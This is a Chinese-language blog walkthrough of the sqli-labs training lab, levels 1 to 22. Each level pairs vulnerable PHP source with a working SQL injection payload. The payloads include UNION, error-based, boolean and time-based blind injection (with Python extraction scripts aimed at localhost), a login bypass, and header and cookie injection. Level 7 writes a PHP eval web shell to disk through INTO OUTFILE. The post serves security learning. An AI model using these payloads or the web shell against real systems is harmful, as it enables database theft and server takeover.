sqli-labs速刷通关

发表于 | 阅读数
字数统计: 2k | 阅读时长 ≈ 11

前言

博主本质:日更(×) 日咕(✓)

目前记录到Less-22 :-)

Creeper?

Awww man.

Less-1

源码:

1
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

payload:

1
?id=-1' union select 1,2,database() --+

Less-2

源码:

1
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

payload:

1
?id=-1 union select 1,2,user() --+

Less-3

源码:

1
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

payload:

1
?id=-1') union select 1,2,user() --+

Less-4

源码:

1
2
$id = '"' . $id . '"';  // 加了双引号,单引号不被解析
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

payload:

1
?id=-1") union select 1,2,database() --+

Less-5

考察点:布尔盲注、报错注入

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';  //不返回查询结果
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="3" color="#FFFF00">';
	print_r(mysql_error());   //输出错误
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

payload1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# -- coding: utf-8 --
import requests
import string

s = requests.session()
character = "abcdefghijklmnopqrstuvwxyz"
length = 32
flag = ""

for i in range(1,length):
    for c in character:
        url = "http://127.0.0.1/sqli-labs/Less-5/?id=1' and ascii(substr((select database()),%d,1)) = %d --+" \
              % (i, ord(c))
        r = s.get(url).text
        if "You are in" in r:
            flag += c
            print(flag)
            break

payload2:

1
2
3
4
5
6
7
8

?id=1' and updatexml(1,concat('~',(your_payload),'~'),3) --+

?id=1' and extractvalue(1,concat(0x7e,(your_payload),0x7e)) --+

?id=1' and exp(~(select * from (your_payload) a) ); --+

?id=1' and (select 1 from (select count(*),concat(((your_payload)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

Less-6

单引号变为双引号,修改一下Less-5的payload即可。

Less-7

考察点:sql文件操作

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
echo '<br>'.$sql.'<br>';
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font color= "#FFFF00">';	
  	echo 'You are in.... Use outfile......';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	echo 'You have an error in your SQL syntax';
	//print_r(mysql_error());
	echo "</font>";  
	}

提示我们用outfile,我们可以写一个shell进去。

payload:

1
?id=1')) union select 1,2,'<script language='php'>@eval($_POST['sketch_pl4ne'])</script>' into outfile 'C:\\xxx\\xxx\\xxx\\output.php' --+  需要是绝对路径

蚁剑连接:

Less-8

考察点:布尔盲注

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="5" color="#FFFF00">';
	//echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

PS:看代码要仔细,这里不输出错误信息,只能盲注。

payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# -- coding: utf-8 --
import requests
import string

s = requests.session()
character = "abcdefghijklmnopqrstuvwxyz"
length = 32
flag = ""

for i in range(1,length):
    for c in character:
        url = "http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),%d,1)) = %d --+" \
              % (i, ord(c))
        r = s.get(url).text
        if "You are in" in r:
            flag += c
            print(flag)
            break

Less-9

考察点:时间盲注

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

这里都会输出You are in...........,也就是说根据返回页面无法判断语句是否执行成功。

所以这里我们用时间盲注。

payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# -- coding: utf-8 --
import requests
import string

character = string.digits + string.ascii_letters + string.punctuation
flag_length = 40
flag = ""

s = requests.session()
for i in range(1, flag_length):
    for c in character:
        url = "http://127.0.0.1/sqli-labs/Less-9/?id=1' and if((ascii(substr((select database()),%d,1)))=%d,sleep(5),0) --+" % (i, ord(c))
        try:
            s.get(url, timeout=4)
        except requests.exceptions.ReadTimeout:
            flag += c
            print(flag)

Less-10

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

payload:

单引号改为双引号 ,payload参考上一题= =

Less-11

考察点:POST注入

目前来说与GET并没有太大区别,之后讲宽字节注入时会加以区分。

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
	$uname=$_POST['uname'];
	$passwd=$_POST['passwd'];

	// connectivity 
	@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
	$result=mysql_query($sql);	
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		echo " You Have successfully logged in\n\n " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		echo 'Your Login name:'. $row['username'];
		echo "<br>";
		echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"  />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg" />';	
		echo "</font>";  
	}
}

payload:

1
2
3
uname=admin' or 1 #
&passwd=everything
&submit=Submit

Less-12

源码:

1
2
3
4
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';

payload:

Less-11的传参添加双引号,参考上一题。

Less-13

考察点:布尔盲注

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		//echo 'Your Login name:'. $row['username'];
		//echo "<br>";
		//echo 'Your Password:' .$row['password'];
		//echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"   />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"   />';	
		echo "</font>";  
	}

发现没有回显,但是有图片成功或者失败的提示,考虑布尔盲注。

payload:

脚本编写参考Less-8,关键是找到有不同回显的地方,当然以及注入点。

Less-14

源码:

1
2
3
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";

payload:

脚本编写参考Less-8。

Less-15

源码:

1
2
3
4
5
6
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];

// connectivity
// @$sql 不显示错误提示
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

payload:

换汤不换药,采用布尔盲注与时间盲注均可。

Less-16

源码:

1
2
3
4
5
6
7
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];

// connectivity
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

payload:

依然是换汤不换药,但也提醒我们要留意参数可能存在的情况:’$id’,”$id”,($id),(“$id”),(‘$id’),(($id))等等。

Less-17

考察点:update语句注入

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
//有点狠的过滤
function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,15);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}


if(isset($_POST['uname']) && isset($_POST['passwd']))

{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);  

$passwd=$_POST['passwd'];

// connectivity 
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
	if($row)
	{
  		//echo '<font color= "#0000ff">';	
		$row1 = $row['username'];  	
		//echo 'Your Login name:'. $row1;
		$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
		mysql_query($update);
		......;
	}

payload:

1
2
3
4
uname=sketch_pl4ne
&passwd=passwd'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
&submit=Submit
//其他报错注入语句自行尝试

Less-18

考察点:HTTP头部注入–UA

源码:

1
2
3
4
5
6
$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

echo 'Your User Agent is: ' .$uagent;

payload:

1
2
//抓包修改UA
' and updatexml(1,concat('~',(database()),'~'),3) and '1'='1

Less-19

考察点:HTTP头部注入–Referer

源码:

1
2
$uagent = $_SERVER['HTTP_REFERER'];
//其余同Less-18

payload:

1
2
//抓包改Referer
' and updatexml(1,concat('~',(database()),'~'),3) and '1'='1

Less-20

考察点:HTTP头部注入–Cookie

源码:

1
2
3
$cookee = $_COOKIE['uname'];
.......
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

payload:

1
2
//抓包改Cookie['uname']
admin1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) #

Less-21

考察点:HTTP头部注入–Cookie、base64编码

源码:

1
2
3
4
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
......
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

payload:

1
2
//抓包改Cookie['uname']
YWRtaW4xJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2VkaXIpLDB4N2UpKSM=

Less-22

源码:

1
2
3
4
5
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
.....
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

payload:

1
2
//抓包改Cookie['uname']
c2tldGNoX3BsNG5lImFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSM=

小结

英语作文还没写,wsl。。。

PPT还没写,wsl。。。

我感觉💊

虽然明天满课(还有两篇英语作文awsl),还是争取写出来八。

0%